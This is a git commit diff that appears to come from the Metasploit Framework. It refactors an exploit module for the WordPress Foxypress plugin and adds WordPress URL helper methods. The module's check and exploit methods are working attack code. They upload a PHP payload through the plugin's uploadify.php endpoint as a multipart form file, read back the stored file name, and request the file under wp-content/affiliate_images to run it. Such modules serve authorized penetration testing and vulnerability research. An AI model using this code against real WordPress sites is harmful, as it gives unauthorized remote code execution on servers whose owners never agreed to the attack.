Land rapid7#3577, @firefart's update for wordpress foxypress module

jvazquez-r7 · jvazquez-r7 · commit 820ea7e50b99 · 2014-07-29T09:10:07.000-05:00
diff --git a/lib/msf/http/wordpress/uris.rb b/lib/msf/http/wordpress/uris.rb
@@ -80,4 +80,25 @@ def wordpress_url_admin_ajax
     normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
   end
 
+  # Returns the Wordpress wp-content dir URL
+  #
+  # @return [String] Wordpress wp-content dir URL
+  def wordpress_url_wp_content
+    normalize_uri(target_uri.path, wp_content_dir)
+  end
+
+  # Returns the Wordpress plugins dir URL
+  #
+  # @return [String] Wordpress plugins dir URL
+  def wordpress_url_plugins
+    normalize_uri(wordpress_url_wp_content, 'plugins')
+  end
+
+  # Returns the Wordpress themes dir URL
+  #
+  # @return [String] Wordpress themes dir URL
+  def wordpress_url_themes
+    normalize_uri(wordpress_url_wp_content, 'themes')
+  end
+
 end
diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -8,17 +8,19 @@
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'           => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution',
-      'Description'    => %q{
+      'Description'    => %q(
           This module exploits an arbitrary PHP code execution flaw in the WordPress
         blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
         file upload and remote code execution via the uploadify.php script. The Foxypress
-        plug-in versions 0.4.2.1 and below are vulnerable.
-      },
+        plug-in versions 0.4.1.1 to 0.4.2.1 are vulnerable.
+      ),
       'Author'         =>
         [
           'Sammy FORGIT', # Vulnerability Discovery, PoC
@@ -27,79 +29,56 @@ def initialize(info = {})
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['EDB', '18991'],
-          ['OSVDB', '82652'],
-          ['BID', '53805'],
+          %w(EDB 18991),
+          %w(OSVDB 82652),
+          %w(BID 53805)
         ],
       'Privileged'     => false,
-      'Payload'        =>
-        {
-          'Compat'      =>
-            {
-              'ConnectionType' => 'find',
-            },
-        },
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
-      'Targets'        => [[ 'Automatic', { }]],
+      'Targets'        => [['Foxypress 0.4.1.1 - 0.4.2.1', {}]],
       'DisclosureDate' => 'Jun 05 2012',
       'DefaultTarget' => 0))
-
-    register_options(
-      [
-        OptString.new('TARGETURI', [true, "The full URI path to WordPress", "/"]),
-      ], self.class)
   end
 
   def check
-    uri = target_uri.path
-
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'GET',
-      'uri'    => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php")
-    })
+      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php')
+    )
 
-    if res and res.code == 200
-      return Exploit::CheckCode::Detected
-    else
-      return Exploit::CheckCode::Safe
-    end
+    return Exploit::CheckCode::Detected if res && res.code == 200
+
+    Exploit::CheckCode::Safe
   end
 
   def exploit
-
-    uri = normalize_uri(target_uri.path)
-    uri << '/' if uri[-1,1] != '/'
-
-    peer = "#{rhost}:#{rport}"
-
     post_data = Rex::MIME::Message.new
-    post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
+    post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
 
     print_status("#{peer} - Sending PHP payload")
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'POST',
-      'uri'    => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php"),
-      'ctype'  => 'multipart/form-data; boundary=' + post_data.bound,
+      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'),
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
       'data'   => post_data.to_s
-    })
+    )
 
-    if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
+    if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
       print_error("#{peer} - File wasn't uploaded, aborting!")
       return
     end
 
-    print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri'    => normalize_uri(uri, "wp-content/affiliate_images", "#{$1}.php")
-    })
+    filename = "#{Regexp.last_match[1]}.php"
 
-    if res and res.code != 200
-      print_error("#{peer} - Server returned #{res.code.to_s}")
-    end
+    print_good("#{peer} - Our payload is at: #{filename}. Calling payload...")
+    register_files_for_cleanup(filename)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename)
+    )
 
+    print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200
   end
-
 end
